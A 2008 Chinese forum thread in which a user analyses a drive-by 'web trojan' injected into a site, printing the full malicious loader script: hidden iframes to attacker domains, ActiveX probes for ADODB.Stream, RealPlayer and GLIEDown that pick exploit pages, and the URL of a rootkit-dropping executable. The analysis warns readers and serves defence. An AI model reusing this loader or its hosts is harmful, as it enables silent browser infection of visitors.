jgwy被挂网马相关分析

huniao · 发表于 2008 年 6 月 24 日 19:42:52

马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。

您需要登录才可以下载或查看，没有账号？注册

×

因为来晚了没有第一时间获知挂马方式未知，但从贴内大家找出的地址来看分析如下：

<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe>

cn4.htm引出<iframe src=http://s82mnl12.cn/xi/xx.htm width=50 height=0></iframe>
低部为统计流量
而xx.htm未使用任何加密方式明文显示

<script language="javaScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="完成";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<iframe width=50 height=0 src=so.htm></iframe>")}
else
{
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<iframe width=0 height=100 src=sr.htm></iframe>')}
else
{
document.write('<iframe width=0 height=100 src=st.htm></iframe>')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=sz.htm></iframe>')}}
}}
}
openWM();
</script>
<iframe src=http://8nnnnn99.cn/9/sf.htm width=100 height=0></iframe>
<script src='http://s127.cnzz.com/stat.php?id=755932&web_id=755932' language='JavaScript' charset='gb2312'></script>

复制代码

以上为自动判断式组合网马
so.htm
sr.htm
st.htm
sz.htm
sf.htm
4文件已加密过杀毒
解密其文件，得到木马地址：http://8nnnnn99.cn/9/ck.exe 慎下
文件大小15.9K
使用多重加壳方式内带Morphine壳常用于加密rootkit内核病毒
该病毒行为插入explorer.exe
带EXE感染性质
写目录为C:\Program Files\HintSoft\PubwinClient\Patch
生成C:\Program Files\360Safebox\sprotect.ini
故疑为机器狗病毒
大家小心

huaduxu · 发表于 2008 年 6 月 24 日 19:49:41

很好我有卡吧

huniao · 发表于 2008 年 6 月 24 日 19:52:15

这个病毒应该是老版新版能过卡巴主动防御

huniao · 发表于 2008 年 6 月 24 日 19:55:39

另
Discuz! 6.0脚本目前无最新漏洞情况
安全原因还是要多从服务器入手

cpcn · 发表于 2008 年 6 月 24 日 19:57:52

昨天网站挂了一次，今天又挂了一次

cnys · 发表于 2008 年 6 月 24 日 20:07:13

redsnow · 发表于 2008 年 6 月 24 日 20:31:41

呵这都让你分析出来了不简单呵

vlin · 发表于 2008 年 6 月 24 日 20:34:43

放屁虫 · 发表于 2008 年 6 月 24 日 20:38:20

偶像级别啊,这玩意都能弄出来,强~

edmin · 发表于 2008 年 6 月 24 日 21:51:14

或者是管理层密码泄露

上次DZ 官方被黑好像就是管理层密码泄露

支持HTML 怎么的加的。。。。

账号		自动登录	找回密码
密码			注册

jgwy被挂网马相关分析

马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。

评分